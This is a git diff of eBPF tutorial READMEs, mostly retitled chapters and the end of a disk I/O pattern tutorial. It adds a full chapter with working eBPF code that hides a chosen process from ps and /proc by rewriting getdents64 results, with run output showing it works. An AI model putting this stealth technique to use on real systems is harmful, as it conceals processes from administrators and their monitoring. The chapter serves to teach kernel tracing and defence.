sector); + nr_sector = BPF_CORE_READ(ctx, nr_sector); + dev = BPF_CORE_READ(ctx, dev); + } + + if (filter_dev && targ_dev != dev) + return 0; + + counterp = bpf_map_lookup_or_try_init(&counters, &dev, &zero); + if (!counterp) + return 0; + if (counterp->last_sector) { + if (counterp->last_sector == sector) + __sync_fetch_and_add(&counterp->sequential, 1); + else + __sync_fetch_and_add(&counterp->random, 1); + __sync_fetch_and_add(&counterp->bytes, nr_sector * 512); + } + counterp->last_sector = sector + nr_sector; + return 0; + } +``` + +In Linux, a trace point called `block_rq_complete` is triggered every time an I/O request for a block device completes. This provides an opportunity to capture these events with eBPF and further analyse the I/O patterns. + +Main Logic Analysis: + +- **Extracting I/O request information**: get information about the I/O request from the incoming parameters. There are two possible context structures depending on the return value of `has_block_rq_completion`. This is because different versions of the Linux kernel may have different tracepoint definitions. In either case, we extract the sector number `(sector)`, the number of sectors `(nr_sector)` and the device identifier `(dev)` from the context. + +- **Device filtering**: If device filtering is enabled `(filter_dev` is `true` ) and the current device is not the target device `(targ_dev` ), it is returned directly. This allows the user to track only specific devices, not all devices. + +- **Statistics update**: + + - **Lookup or initialise statistics**: use the `bpf_map_lookup_or_try_init` function to lookup or initialise statistics related to the current device. If there is no statistics for the current device in the map, it will be initialised using the `zero` structure. +- **Determine the I/O mode**: Based on the sector number of the current I/O request and the previous I/O request, we can determine whether the current request is random or sequential. If the sector numbers of the two requests are the same, then it is sequential; otherwise, it is random. We then use the `__sync_fetch_and_add` function to update the corresponding statistics. This is an atomic operation that ensures data consistency in a concurrent environment. +- **Update the amount of data**: we also update the total amount of data for the device, which is done by multiplying the number of sectors `(nr_sector` ) by 512 (the number of bytes per sector). +- **Update the sector number of the last I/O request**: for the next comparison, we update the value of `last_sector`. + +In some versions of the Linux kernel, the naming and structure of the tracepoint has changed due to the introduction of a new tracepoint, `block_rq_error`. This means that the structural name of the former `block_rq_complete` tracepoint has been changed from `trace_event_raw_block_rq_complete` to `trace_event_raw_block_rq_completion`, a change which may cause compatibility issues with eBPF programs on different versions of the kernel. This change may cause compatibility issues with eBPF programs on different versions of the kernel. + +To address this issue, the `biopattern` utility introduces a mechanism to dynamically detect which trace point structure is currently used by the kernel, namely the `has_block_rq_completion` function. + +1. **Define two trace point structures**: + +```c + struct trace_event_raw_block_rq_complete___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); + + struct trace_event_raw_block_rq_completion___x { + dev_t dev; + sector_t sector; + unsigned int nr_sector; + } __attribute__((preserve_access_index)); +``` + +Two tracepoint structures are defined here, corresponding to different versions of the kernel. Each structure contains a device identifier `(dev` ), sector number `(sector` ), and number of sectors `(nr_sector` ). + +2. **Dynamic detection of trackpoint structures**: + +```c + static __always_inline bool has_block_rq_completion() + { + if (bpf_core_type_exists(struct trace_event_raw_block_rq_completion___x)) + return true; + return false; + } +``` + +The `has_block_rq_completion` function uses the `bpf_core_type_exists` function to detect the presence of the structure `trace_event_raw_block_rq_completion___x` in the current kernel. If it exists, the function returns `true`, indicating that the current kernel is using the new tracepoint structure; otherwise, it returns `false`, indicating that it is using the old structure. The two different definitions are handled separately in the corresponding eBPF code, which is a common solution for adapting to changes between kernel versions. + +### User State Code + +The `biopattern` tool's userland code is responsible for reading statistics from the BPF mapping and presenting them to the user. In this way, system administrators can monitor the I/O patterns of each device in real time to better understand and optimise the I/O performance of the system. + +1. Main loop + +```c + /* main: poll */ + while (1) { + sleep(env.interval); + + err = print_map(obj->maps.counters, partitions); + if (err) + break; + + if (exiting || --env.times == 0) + break; + } +``` + +This is the main loop of the `biopattern` utility, and its workflow is as follows: + +- **Wait**: use the `sleep` function to wait for the specified interval `(env.interval` ). +- `print_map`: call `print_map` function to print the statistics in BPF map. +- **Exit condition**: if an exit signal is received `(exiting` is `true` ) or if the specified number of runs is reached `(env.times` reaches 0), the loop exits. + +2. Print mapping function + +```c + static int print_map(struct bpf_map *counters, struct partitions *partitions) + { + __u32 total, lookup_key = -1, next_key; + int err, fd = bpf_map__fd(counters); + const struct partition *partition; + struct counter counter; + struct tm *tm; + char ts[32]; + time_t t; + + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_lookup_elem(fd, &next_key, &counter); + if (err < 0) { + fprintf(stderr, "failed to lookup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + total = counter.sequential + counter.random; + if (!total) + continue; + if (env.timestamp) { + time(&t); + tm = localtime(&t); + strftime(ts, sizeof(ts), "%H:%M:%S", tm); + printf("%-9s ", ts); + } + partition = partitions__get_by_dev(partitions, next_key); + printf("%-7s %5ld %5ld %8d %10lld\n", + partition ? partition->name : "Unknown", + counter.random * 100L / total, + counter.sequential * 100L / total, total, + counter.bytes / 1024); + } + + lookup_key = -1; + while (!bpf_map_get_next_key(fd, &lookup_key, &next_key)) { + err = bpf_map_delete_elem(fd, &next_key); + if (err < 0) { + fprintf(stderr, "failed to cleanup counters: %d\n", err); + return -1; + } + lookup_key = next_key; + } + + return 0; + } +``` + +The `print_map` function is responsible for reading statistics from the BPF map and printing them to the console. The main logic is as follows: + +- **Traverse the BPF map**: Use the `bpf_map_get_next_key` and `bpf_map_lookup_elem` functions to traverse the BPF map and get the statistics for each device. +- **Calculate totals**: Calculate the total number of random and sequential I/Os for each device. +- **Print statistics**: If timestamp is enabled `(env.timestamp` is `true` ), the current time is printed first. Next, the device name, percentage of random I/O, percentage of sequential I/O, total I/O, and total data in KB are printed. +- **Cleaning up the BPF map**: For the next count, use the `bpf_map_get_next_key` and `bpf_map_delete_elem` functions to clean up all entries in the BPF map. + +## Summary + +In this tutorial, we have taken an in-depth look at how to use the eBPF tool biopattern to monitor and count random and sequential disk I/O in real-time. we started by understanding the importance of random and sequential disk I/O and their impact on system performance. We then describe in detail how biopattern works, including how to define and use BPF maps, how to deal with tracepoint variations in different versions of the Linux kernel, and how to capture and analyse disk I/O events in an eBPF program. + +You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. + +- Source repo: +- bcc tool: diff --git a/src/19-lsm-connect/README_en.md b/src/19-lsm-connect/README_en.md index 0c6b15b..adfaefb 100644 --- a/src/19-lsm-connect/README_en.md +++ b/src/19-lsm-connect/README_en.md @@ -1,4 +1,4 @@ -# eBPF Getting Started Tutorial: Security Detection and Defense using LSM +# eBPF Tutorial by Example: Security Detection and Defense using LSM eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying the kernel source code. This feature enables eBPF to provide high flexibility and performance, making it widely applicable in network and system performance analysis. The same applies to eBPF applications in security, and this article will introduce how to use the eBPF LSM (Linux Security Modules) mechanism to implement a simple security check program. diff --git a/src/2-kprobe-unlink/README_en.md b/src/2-kprobe-unlink/README_en.md index 45165e6..139aa5c 100644 --- a/src/2-kprobe-unlink/README_en.md +++ b/src/2-kprobe-unlink/README_en.md @@ -1,8 +1,8 @@ -# eBPF Beginner's Development Practice Tutorial 2: Using kprobe to Monitor the unlink System Call in eBPF +# eBPF Tutorial by Example 2: Monitoring unlink System Calls with kprobe eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. -This article is the second part of the eBPF beginner's development practice tutorial, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF. +This article is the second part of the eBPF Tutorial by Example, focusing on using kprobe to capture the unlink system call in eBPF. The article will first explain the basic concepts and technical background of kprobes, and then introduce how to use kprobe to capture the unlink system call in eBPF. ## Background of kprobes Technology diff --git a/src/20-tc/README_en.md b/src/20-tc/README_en.md index 34d7ff0..c0d5c2c 100644 --- a/src/20-tc/README_en.md +++ b/src/20-tc/README_en.md @@ -1,4 +1,4 @@ -# eBPF Introductory Practice Tutorial 20: Use eBPF for tc Traffic Control +# eBPF Tutorial by Example 20: Use eBPF for tc Traffic Control ## Background diff --git a/src/21-xdp/README_en.md b/src/21-xdp/README_en.md index 3918226..5c1b635 100644 --- a/src/21-xdp/README_en.md +++ b/src/21-xdp/README_en.md @@ -1,4 +1,4 @@ -# eBPF Beginner Tutorial 21: Programmable Packet Processing with XDP +# eBPF Tutorial by Example 21: Programmable Packet Processing with XDP ## Background diff --git a/src/24-hide/README_en.md b/src/24-hide/README_en.md index f9ae6da..9d9bb8c 100644 --- a/src/24-hide/README_en.md +++ b/src/24-hide/README_en.md @@ -1 +1,427 @@ -# TODO: translate into English \ No newline at end of file +# eBPF Development Practice: Hiding Process or File Information with eBPF + +eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows you to run, load, and update user-defined code without having to change the kernel source code or reboot the kernel. This capability allows eBPF to be used in a wide range of applications such as network and system performance analysis, packet filtering, and security policies. + +In this tutorial, we will show how eBPF can be used to hide process or file information, a common technique in the field of network security and defence. + +## Background Knowledge and Implementation Mechanism + +"Process hiding" enables a specific process to become invisible to the operating system's regular detection mechanisms. This technique can be used in both hacking and system defence scenarios. Specifically, each process on a Linux system has a subfolder named after its process ID in the /proc/ directory, which contains various information about the process. `ps` displays process information by looking in these folders. Therefore, if we can hide the /proc/ folder of a process, we can make that process invisible to `ps` commands and other detection methods. + +The key to achieving process hiding is to manipulate the `/proc/` directory. In Linux, the `getdents64` system call can read the information of files in the directory. We can hide files by hooking into this system call and modifying the results it returns. To do this, you need to use eBPF's `bpf_probe_write_user` function, which can modify user-space memory, and therefore can be used to modify the results returned by `getdents64`. + +In the following, we will describe in detail how to write eBPF programs in both kernel and user states to implement process hiding. + +### Kernel eBPF Program Implementation + +Next, we will describe in detail how to write eBPF program to implement process hiding in kernel state. The first part of the eBPF programme is the start: + +```c +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to fold the dents buffer addresses +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buffs SEC(".maps"); + +// Map used to enable searching through the +// data in a loop +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, int); +} map_bytes_read SEC(".maps"); + +// Map with address of actual +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_to_patch SEC(".maps"); + +// Map to hold program tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); +``` + +The first thing we need to do is to understand the basic structure of the eBPF programme and the important components that are used. The first few lines reference several important header files, such as "vmlinux.h", "bpf_helpers.h", "bpf_tracing.h" and "bpf_core_read.h". These files provide the infrastructure needed for eBPF programming and some important functions or macros. + +- "vmlinux.h" is a header file containing the complete kernel data structures extracted from the vmlinux kernel binary. Using this header file, eBPF programs can access kernel data structures. +- The "bpf_helpers.h" header file defines a series of macros that encapsulate the BPF helper functions used by eBPF programs. These BPF helper functions are the main way that eBPF programs interact with the kernel. +- The "bpf_tracing.h" header file for tracing events contains a number of macros and functions designed to simplify the operation of tracepoints for eBPF programs. +- The "bpf_core_read.h" header file provides a set of macros and functions for reading data from the kernel. + +The program defines a series of map structures, which are the main data structures in an eBPF program, and are used to share data between the kernel and the user, or to store and transfer data within the eBPF program. + +Among them, "rb" is a map of type Ringbuffer, which is used to pass messages from the kernel to the userland; Ringbuffer is a data structure that can efficiently pass large amounts of data between the kernel and the userland. + +"map_buffs" is a map of type Hash which is used to store buffer addresses for directory entries. + +"map_bytes_read" is another Hash-type map that is used to enable searching in data loops. + +"map_to_patch" is another Hash type map that stores the address of the directory entry (dentry) that needs to be modified. + +"map_prog_array" is a map of type Prog Array, which is used to store the tail calls of a programme. + +The "target_ppid" and "pid_to_hide_len" and "pid_to_hide" in the program are a few important global variables that store the PID of the target parent process, the length of the PID that needs to be hidden, and the PID that needs to be hidden, respectively. + +In the next part of the code, the program defines a structure called "linux_dirent64", which represents a Linux directory entry. The program then defines two functions, "handle_getdents_enter" and "handle_getdents_exit", which are called at the entry and exit of the getdents64 system call, respectively, and are used to implement operations on the directory entry. + +```c + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string represenation +// of the PID to hide. This becomes the name +// of the folder in /proc/ +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[max_pid_len]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} +``` + +In this section of the code, we can see part of the implementation of the eBPF program that is responsible for the processing at the entry point of the `getdents64` system call. + +We start by declaring a few global variables. The `target_ppid` represents the PID of the target parent we want to focus on, and if this value is 0, then we will focus on all processes. `pid_to_hide_len` and `pid_to_hide` are used to store the length of the PID of the process we want to hide from, and the PID itself, respectively. This PID is translated into the name of a folder in the `/proc/` directory, so the hidden process will not be visible in the `/proc/` directory. + +Next, we declare a structure called `linux_dirent64`. This structure represents a Linux directory entry and contains metadata such as the inode number, the offset of the next directory entry, the length of the current directory entry, the file type, and the filename. + +Then there is the prototype for the `getdents64` function. This function is a Linux system call that reads the contents of a directory. Our goal is to modify the directory entries during the execution of this function to enable process hiding. + +The subsequent section is the concrete implementation of the eBPF program. We define a function called `handle_getdents_enter` at the entry point of the `getdents64` system call. This function first gets the PID and thread group ID of the current process, and then checks to see if it is the process we are interested in. If we set `target_ppid`, then we only focus on processes whose parent has a PID of `target_ppid`. If `target_ppid` is 0, we focus on all processes. + +After confirming that the current process is the one we are interested in, we save the arguments to the `getdents64` system call into a map to be used when the system call returns. In particular, we focus on the second argument to the `getdents64` system call, which is a pointer to the `linux_dirent64` structure representing the contents of the directory to be read by the system call. We save this pointer, along with the current PID and thread group ID, as a key-value pair in the `map_buffs` map. + +This completes the processing at the entry point of the `getdents64` system call. When the system call returns, we will modify the directory entry in the `handle_getdents_exit` function to hide the process. + +In the next snippet, we will implement the handling at the return of the `getdents64` system call. Our main goal is to find the process we want to hide and modify the directory entry to hide it. + +We start by defining a function called `handle_getdents_exit` that will be called when the `getdents64` system call returns. + +```c + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. + // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[max_pid_len]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +``` + +In this function, we first get the PID and thread group ID of the current process, and then check to see if the system call has read the contents of the directory. If it didn't read the contents, we just return. + +Then we get the address of the directory contents saved at the entry point of the `getdents64` system call from the `map_buffs` map. If we haven't saved this address, then there's no need to do any further processing. + +The next part is a bit more complicated, we use a loop to iteratively read the contents of the directory and check to see if we have the PID of the process we want to hide, and if we do, we use the `bpf_tail_call` function to jump to the `handle_getdents_patch` function to do the actual hiding. + +```c +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[max_pid_len]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} + +``` + +In the `handle_getdents_patch` function, we first check to see if we have found the PID of the process we want to hide, and then we read the contents of the directory entry and modify the `d_reclen` field so that it overwrites the next directory entry, thus hiding our target process. + +In this process, we use the functions `bpf_probe_read_user`, `bpf_probe_read_user_str`, and `bpf_probe_write_user` to read and write user-space data. This is because in kernel space, we can't access user space data directly and must use these special functions. + +After we finish the hiding operation, we send an event to a ring buffer called `rb` indicating that we have successfully hidden a process. We reserve space in the buffer with the `bpf_ringbuf_reserve` function, then fill that space with the event's data, and finally commit the event to the buffer with the `bpf_ringbuf_submit` function. + +Finally, we clean up the data previously saved in the map and return. + +This code is a good example of process hiding in an eBPF environment. Through this example, we can see the rich features provided by eBPF, such as system call tracing, map storage, user-space data access, tail calls, and so on. These features allow us to implement complex logic in kernel space without modifying the kernel code. + +## User-Style eBPF Programming + +We perform the following operations in the userland eBPF program: + +1. Open the eBPF program. +2. Set the PID of the process we want to hide. +3. Verify and load the eBPF program. +4. Wait for and process events sent by the eBPF program. + +First, we open the eBPF application. This is done by calling the `pidhide_bpf__open` function. If this process fails, we simply return. + +```c + skel = pidhide_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } +``` + +Next, we set the PIDs of the processes we want to hide, which is done by saving the PIDs to the `rodata` area of the eBPF program. By default, we hide the current process. + +```c + char pid_to_hide[10]; + if (env.pid_to_hide == 0) + { + env.pid_to_hide = getpid(); + } + sprintf(pid_to_hide, "%d", env.pid_to_hide); + strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); + skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; + skel->rodata->target_ppid = env.target_ppid; +``` + +We then validate and load the eBPF program. This is done by calling the `pidhide_bpf__load` function. If this process fails, we perform a cleanup operation. + +```c + err = pidhide_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } +``` + +Finally, we wait for and process events sent by the eBPF program. This process is achieved by calling the `ring_buffer__poll` function. During this process, we check the ring buffer every so often for new events. If there is, we call the `handle_event` function to handle the event. + +```c +printf("Successfully started!\n"); +printf("Hiding PID %d\n", env.pid_to_hide); +while (!exiting) +{ + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) + { + err = 0; + break; + } + if (err < 0) + { + printf("Error polling perf buffer: %d\n", err); + break; + } +} +``` + +In the `handle_event` function, we print the appropriate message based on the content of the event. The arguments to this function include a context, the data of the event, and the size of the data. We first convert the event data into an `event` structure, then determine if the event successfully hides a process based on the `success` field, and finally print the corresponding message. + +and then print the corresponding message. + +```c +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Hid PID from program %d (%s)\n", e->pid, e->comm); + else + printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); + return 0; +} +``` + +This code shows how to use the eBPF programme to hide a process in the user state. We first open the eBPF application, then set the PID of the process we want to hide, then validate and load the eBPF application, and finally wait for and process the events sent by the eBPF application. This process makes use of some advanced features provided by eBPF, such as ring buffers and event handling, which allow us to easily interact with the kernel state eBPF program from the user state. + +Full source code: https: [//github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide](https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide) + +> The techniques shown in this paper are for proof of concept only and are intended for learning purposes only, and are not to be used in scenarios that do not comply with legal or regulatory requirements. + +## Compile and Run + +```bash +make +``` + +```sh +sudo ./pidhide --pid-to-hide 1534 +``` + +```console +$ ps -aux | grep 1534 +yunwei 1534 0.0 0.0 244540 6848 ? Ssl 6月02 0:00 /usr/libexec/gvfs-mtp-volume-monitor +yunwei 32065 0.0 0.0 17712 2580 pts/1 S+ 05:43 0:00 grep --color=auto 1534 +``` + +```console +$ sudo ./pidhide --pid-to-hide 1534 +Hiding PID 1534 +Hid PID from program 31529 (ps) +Hid PID from program 31551 (ps) +Hid PID from program 31560 (ps) +Hid PID from program 31582 (ps) +Hid PID from program 31582 (ps) +Hid PID from program 31585 (bash) +Hid PID from program 31585 (bash) +Hid PID from program 31609 (bash) +Hid PID from program 31640 (ps) +Hid PID from program 31649 (ps) +``` + +```console +$ ps -aux | grep 1534 +root 31523 0.1 0.0 22004 5616 pts/2 S+ 05:42 0:00 sudo ./pidhide -p 1534 +root 31524 0.0 0.0 22004 812 pts/3 Ss 05:42 0:00 sudo ./pidhide -p 1534 +root 31525 0.3 0.0 3808 2456 pts/3 S+ 05:42 0:00 ./pidhide -p 1534 +yunwei 31583 0.0 0.0 17712 2612 pts/1 S+ 05:42 0:00 grep --color=auto 1534 +``` + +## Summary + +You can also visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and the full tutorial. diff --git a/src/3-fentry-unlink/README_en.md b/src/3-fentry-unlink/README_en.md index 6e20f2e..7b3bd10 100644 --- a/src/3-fentry-unlink/README_en.md +++ b/src/3-fentry-unlink/README_en.md @@ -1,8 +1,8 @@ -# eBPF Introductory Development Practice Tutorial 3: Detecting Captured Unlink System Calls in eBPF +# eBPF Tutorial by Example 3: Monitoring unlink System Calls with fentry eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and execute user-defined code at runtime in the kernel. -This article is the third part of the eBPF introductory development practice tutorial, focusing on capturing unlink system calls using fentry in eBPF. +This article is the third part of the eBPF Tutorial by Example, focusing on capturing unlink system calls using fentry in eBPF. ## Fentry @@ -83,6 +83,6 @@ $ sudo cat /sys/kernel/debug/tracing/trace_pipe This program is an eBPF program that captures the `do_unlinkat` and `do_unlinkat_exit` functions using fentry and fexit, and uses `bpf_get_current_pid_tgid` and `bpf_printk` functions to obtain the ID, filename, and return value of the process calling do_unlinkat, and print them in the kernel log. -To compile this program, you can use the ecc tool, and to run it, you can use the ecli command, and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. For more examples and detailed development guide, please refer to the official documentation of eunomia-bpf: [here](https://github.com/eunomia-bpf/eunomia-bpf) +To compile this program, you can use the ecc tool, and to run it, you can use the ecli command, and view the output of the eBPF program by checking the `/sys/kernel/debug/tracing/trace_pipe` file. -If you want to learn more about eBPF knowledge and practice, you can visit our tutorial code repository [here](https://github.com/eunomia-bpf/bpf-developer-tutorial) for more examples and complete tutorials.". +If you'd like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and complete tutorials. diff --git a/src/4-opensnoop/README_en.md b/src/4-opensnoop/README_en.md index 86a1154..9c29128 100644 --- a/src/4-opensnoop/README_en.md +++ b/src/4-opensnoop/README_en.md @@ -1,8 +1,8 @@ -# eBPF Getting Started Development Tutorial 4: Capturing the System Call Collection of Process Opening Files in eBPF and Using Global Variables to Filter Process PIDs +# eBPF Tutorial by Example 4: Capturing Process Opening Files and Filter with Global Variables eBPF (Extended Berkeley Packet Filter) is a kernel execution environment that allows users to run secure and efficient programs in the kernel. It is commonly used for network filtering, performance analysis, security monitoring, and other scenarios. The power of eBPF lies in its ability to capture and modify network packets or system calls at runtime in the kernel, enabling monitoring and adjustment of the operating system's behavior. -This article is the fourth part of the eBPF Getting Started Development Tutorial, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF. +This article is the fourth part of the eBPF Tutorial by Example, mainly focusing on how to capture the system call collection of process opening files and filtering process PIDs using global variables in eBPF. In Linux system, the interaction between processes and files is achieved through system calls. System calls serve as the interface between user space programs and kernel space programs, allowing user programs to request specific operations from the kernel. In this tutorial, we focus on the sys_openat system call, which is used to open files. @@ -119,6 +119,4 @@ This article introduces how to use eBPF programs to capture the system calls for By learning this tutorial, you should have a deeper understanding of how to capture and filter system calls for specific processes in eBPF. This method has widespread applications in system monitoring, performance analysis, and security auditing. -For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf: - If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website for more examples and a complete tutorial. diff --git a/src/5-uprobe-bashreadline/README_en.md b/src/5-uprobe-bashreadline/README_en.md index e5a72cc..fa51296 100644 --- a/src/5-uprobe-bashreadline/README_en.md +++ b/src/5-uprobe-bashreadline/README_en.md @@ -1,8 +1,8 @@ -# eBPF Beginner's Development Tutorial 5: Capturing readline Function Calls in eBPF +# eBPF Tutorial by Example 5: Capturing readline Function Calls with uprobe eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel that allows developers to dynamically load, update, and run user-defined code at runtime. -This article is the fifth part of the eBPF beginner's development tutorial, which mainly introduces how to capture readline function calls in bash using uprobe. +This article is the fifth part of the eBPF Tutorial by Example, which mainly introduces how to capture readline function calls in bash using uprobe. ## What is uprobe @@ -119,6 +119,4 @@ You can see that we have successfully captured the `readline` function call of ` In the above code, we used the `SEC` macro to define an uprobe probe, which specifies the user space program (`bin/bash`) to be captured and the function (`readline`) to be captured. In addition, we used the `BPF_KRETPROBE` macro to define a callback function (`printret`) for handling the return value of the `readline` function. This function can retrieve the return value of the `readline` function and print it to the kernel log. In this way, we can use eBPF to capture the `readline` function call of `bash` and obtain the command line entered by the user in `bash`. -For more examples and detailed development guides, please refer to the official documentation of eunomia-bpf: - -If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. \ No newline at end of file +If you want to learn more about eBPF knowledge and practices, you can visit our tutorial code repository or website to get more examples and complete tutorials. diff --git a/src/6-sigsnoop/README.md 